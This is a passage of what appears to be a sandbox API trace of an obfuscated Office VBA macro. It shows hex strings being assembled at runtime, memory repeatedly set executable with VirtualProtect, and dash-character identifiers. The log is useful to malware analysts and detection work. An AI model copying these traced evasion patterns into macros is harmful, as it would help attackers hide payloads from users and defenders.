(pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.397] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.397] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.397] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.397] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.397] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.398] VarSub (in: pvarLeft=0x197bb4, pvarRight=0x197ba4, pvarResult=0x197b94 | out: pvarResult=0x197b94) returned 0x0 [0102.398] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x197b90 | out: ppsaOut=0x197b90) returned 0x0 [0102.398] SafeArrayAllocData (psa=0xb3bf3b8) returned 0x0 [0102.417] VarBstrCat (in: bstrLeft="&", bstrRight="H", pbstrResult=0x197ac4 | out: pbstrResult=0x197ac4) returned 0x0 [0102.417] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.417] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.417] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.417] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.417] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.417] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.417] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.417] VarSub (in: pvarLeft=0x197bb4, pvarRight=0x197ba4, pvarResult=0x197b94 | out: pvarResult=0x197b94) returned 0x0 [0102.417] CRetailMalloc_Alloc () returned 0xca3d228 [0102.417] memcpy (in: _Dst=0xcb65188, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.417] memcpy (in: _Dst=0xcb6518c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.417] memcpy (in: _Dst=0xcb65190, _Src=0x19741c, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0102.417] memcpy (in: _Dst=0xcb6518c, _Src=0x1973c8, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.417] memcpy (in: _Dst=0xcb65190, _Src=0x19741c, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0102.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11431146, cbMultiByte=4, lpWideCharStr=0x197204, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0102.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d1146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0102.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d1146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0102.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d1146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0102.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d1146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0102.418] CRetailMalloc_Alloc () returned 0xf616648 [0102.418] _mbscpy_s (in: _Dst=0xf616648, _DstSizeInBytes=0x4, _Src=0x111d1146 | out: _Dst=0xf616648) returned 0x0 [0102.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0c1e, cbMultiByte=11, lpWideCharStr=0x197274, cchWideChar=12 | out: lpWideCharStr="_B_var_Mid") returned 11 [0102.419] CRetailMalloc_Free () returned 0x1 [0102.419] memcpy (in: _Dst=0xcb65188, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6936ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0102.419] memcpy (in: _Dst=0xca3d270, _Src=0x197484, _Size=0x18 | out: _Dst=0xca3d270) returned 0xca3d270 [0102.419] CRetailMalloc_Realloc () returned 0xca3d228 [0102.419] CRetailMalloc_Free () returned 0x1 [0102.420] GetCurrentProcess () returned 0xffffffff [0102.420] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.420] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.420] GetCurrentProcess () returned 0xffffffff [0102.421] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.421] GetCurrentProcess () returned 0xffffffff [0102.421] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.421] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.421] GetCurrentProcess () returned 0xffffffff [0102.421] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.421] GetCurrentProcess () returned 0xffffffff [0102.421] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.421] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.422] GetCurrentProcess () returned 0xffffffff [0102.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.422] GetCurrentProcess () returned 0xffffffff [0102.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.422] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.422] GetCurrentProcess () returned 0xffffffff [0102.423] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.423] GetCurrentProcess () returned 0xffffffff [0102.423] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.423] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.431] GetCurrentProcess () returned 0xffffffff [0102.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.431] GetCurrentProcess () returned 0xffffffff [0102.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.431] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.432] GetCurrentProcess () returned 0xffffffff [0102.432] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.432] GetCurrentProcess () returned 0xffffffff [0102.432] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.432] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.433] GetCurrentProcess () returned 0xffffffff [0102.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.433] GetCurrentProcess () returned 0xffffffff [0102.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.433] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.434] GetCurrentProcess () returned 0xffffffff [0102.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.434] GetCurrentProcess () returned 0xffffffff [0102.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.434] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.434] GetCurrentProcess () returned 0xffffffff [0102.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.434] GetCurrentProcess () returned 0xffffffff [0102.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.435] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.435] GetCurrentProcess () returned 0xffffffff [0102.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.435] GetCurrentProcess () returned 0xffffffff [0102.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.435] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.436] GetCurrentProcess () returned 0xffffffff [0102.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.436] GetCurrentProcess () returned 0xffffffff [0102.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.436] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.436] GetCurrentProcess () returned 0xffffffff [0102.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.436] GetCurrentProcess () returned 0xffffffff [0102.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.437] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.437] GetCurrentProcess () returned 0xffffffff [0102.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.437] GetCurrentProcess () returned 0xffffffff [0102.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.437] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.438] GetCurrentProcess () returned 0xffffffff [0102.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.438] GetCurrentProcess () returned 0xffffffff [0102.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.438] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.439] GetCurrentProcess () returned 0xffffffff [0102.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.439] GetCurrentProcess () returned 0xffffffff [0102.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.439] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.440] GetCurrentProcess () returned 0xffffffff [0102.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.440] GetCurrentProcess () returned 0xffffffff [0102.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.440] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.441] GetCurrentProcess () returned 0xffffffff [0102.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.441] GetCurrentProcess () returned 0xffffffff [0102.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.441] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.441] GetCurrentProcess () returned 0xffffffff [0102.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.441] GetCurrentProcess () returned 0xffffffff [0102.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.441] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.442] GetCurrentProcess () returned 0xffffffff [0102.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.442] GetCurrentProcess () returned 0xffffffff [0102.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.442] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.443] GetCurrentProcess () returned 0xffffffff [0102.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.443] GetCurrentProcess () returned 0xffffffff [0102.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.443] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.443] GetCurrentProcess () returned 0xffffffff [0102.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.443] GetCurrentProcess () returned 0xffffffff [0102.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.443] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.444] GetCurrentProcess () returned 0xffffffff [0102.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.444] GetCurrentProcess () returned 0xffffffff [0102.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.444] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.445] GetCurrentProcess () returned 0xffffffff [0102.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.445] GetCurrentProcess () returned 0xffffffff [0102.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.445] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.445] GetCurrentProcess () returned 0xffffffff [0102.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.445] GetCurrentProcess () returned 0xffffffff [0102.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.445] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.446] GetCurrentProcess () returned 0xffffffff [0102.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.446] GetCurrentProcess () returned 0xffffffff [0102.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.446] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.447] GetCurrentProcess () returned 0xffffffff [0102.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.447] GetCurrentProcess () returned 0xffffffff [0102.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.447] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.447] GetCurrentProcess () returned 0xffffffff [0102.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.447] GetCurrentProcess () returned 0xffffffff [0102.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.447] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.448] GetCurrentProcess () returned 0xffffffff [0102.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.448] GetCurrentProcess () returned 0xffffffff [0102.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.448] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.449] GetCurrentProcess () returned 0xffffffff [0102.449] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.449] GetCurrentProcess () returned 0xffffffff [0102.449] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.449] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.449] GetCurrentProcess () returned 0xffffffff [0102.449] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.449] GetCurrentProcess () returned 0xffffffff [0102.449] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.449] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.450] GetCurrentProcess () returned 0xffffffff [0102.450] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.450] SetErrorMode (uMode=0x8001) returned 0x8001 [0102.450] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0102.450] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x69130000 [0102.451] SetErrorMode (uMode=0x8001) returned 0x8001 [0102.451] GetProcAddress (hModule=0x69130000, lpProcName=0x278) returned 0x691b63c4 [0102.452] GetAsyncKeyState (vKey=3) returned 0 [0102.452] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.453] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.453] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.453] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.453] CRetailMalloc_Alloc () returned 0xca3d2b8 [0102.453] memcpy (in: _Dst=0xcb65188, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.453] memcpy (in: _Dst=0xcb65290, _Src=0x197404, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0102.453] memcpy (in: _Dst=0xcb65188, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11430386, cbMultiByte=5, lpWideCharStr=0x197204, cchWideChar=6 | out: lpWideCharStr="CDec") returned 5 [0102.453] CRetailMalloc_Realloc () returned 0xb310c50 [0102.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d0386, cbMultiByte=5, lpWideCharStr=0x197264, cchWideChar=6 | out: lpWideCharStr="CDec") returned 5 [0102.454] CRetailMalloc_Realloc () returned 0xb3d4558 [0102.477] memcpy (in: _Dst=0xcb65188, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.477] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x97\x97\x96\x97\x97\x96\x97\x96\x96\x96\x97\x97\x97\x97\x97\x97\x96\x97\x96\x97\x96\x96\x96", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount2=-1) returned 3 [0102.477] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x97\x97\x96\x96\x96\x96\x97\x97", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount2=-1) returned 1 [0102.477] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x96\x96\x96\x97\x96\x97\x96\x96\x96\x96\x97\x97\x96\x97\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount2=-1) returned 3 [0102.477] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x97\x97\x96", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount2=-1) returned 3 [0102.477] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount2=-1) returned 1 [0102.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432eb2, cbMultiByte=27, lpWideCharStr=0x197204, cchWideChar=28 | out: lpWideCharStr="–————–––––———–————–———–——–") returned 27 [0102.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b07ba, cbMultiByte=27, lpWideCharStr=0x197264, cchWideChar=28 | out: lpWideCharStr="–————–––––———–————–———–——–") returned 27 [0102.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b07ba, cbMultiByte=27, lpWideCharStr=0x197264, cchWideChar=28 | out: lpWideCharStr="–————–––––———–————–———–——–") returned 27 [0102.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b07ba, cbMultiByte=27, lpWideCharStr=0x197264, cchWideChar=28 | out: lpWideCharStr="–————–––––———–————–———–——–") returned 27 [0102.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x97\x97\x96\x97\x97\x96\x97\x96\x96\x96\x97\x97\x97\x97\x97\x97\x96\x97\x96\x97\x96\x96\x96", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount2=-1) returned 3 [0102.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x97\x97\x96\x96\x96\x96\x97\x97", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount2=-1) returned 1 [0102.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x96\x96\x96\x97\x96\x97\x96\x96\x96\x96\x97\x97\x96\x97\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount2=-1) returned 3 [0102.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x97\x97\x96", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount2=-1) returned 3 [0102.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount2=-1) returned 1 [0102.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b07ba, cbMultiByte=27, lpWideCharStr=0x197264, cchWideChar=28 | out: lpWideCharStr="–————–––––———–————–———–——–") returned 27 [0102.479] CRetailMalloc_Alloc () returned 0xb3bf168 [0102.479] _mbscpy_s (in: _Dst=0xb3bf168, _DstSizeInBytes=0x1b, _Src=0x112b07ba | out: _Dst=0xb3bf168) returned 0x0 [0102.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="_B_var_\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="_B_var_\x96\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount2=-1) returned 